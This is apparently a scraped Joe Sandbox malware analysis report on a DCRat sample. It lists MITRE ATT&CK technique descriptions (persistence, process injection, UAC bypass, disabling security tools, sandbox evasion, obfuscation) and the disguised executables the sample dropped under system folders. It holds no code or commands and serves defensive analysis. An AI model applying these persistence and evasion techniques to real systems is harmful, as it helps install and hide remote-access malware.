Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Queries volume information: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Recovery\System.exe	Queries volume information: C:\Recovery\System.exe VolumeInformation

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4KjLUaW30K.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\f8edc2df584126

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe:Zone.Identifier

C:\Program Files (x86)\Mozilla Maintenance Service\logs\42af1c969fbb7b

C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe

C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe:Zone.Identifier

C:\Program Files (x86)\Windows Defender\5940a34987c991

C:\Program Files (x86)\Windows Defender\dllhost.exe

C:\Program Files (x86)\Windows Defender\dllhost.exe:Zone.Identifier

C:\ProgramData\USOShared\Logs\f8edc2df584126

C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe:Zone.Identifier

C:\Recovery\27d1bcfc3c54e0

C:\Recovery\System.exe

Windows Analysis Report
4KjLUaW30K.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre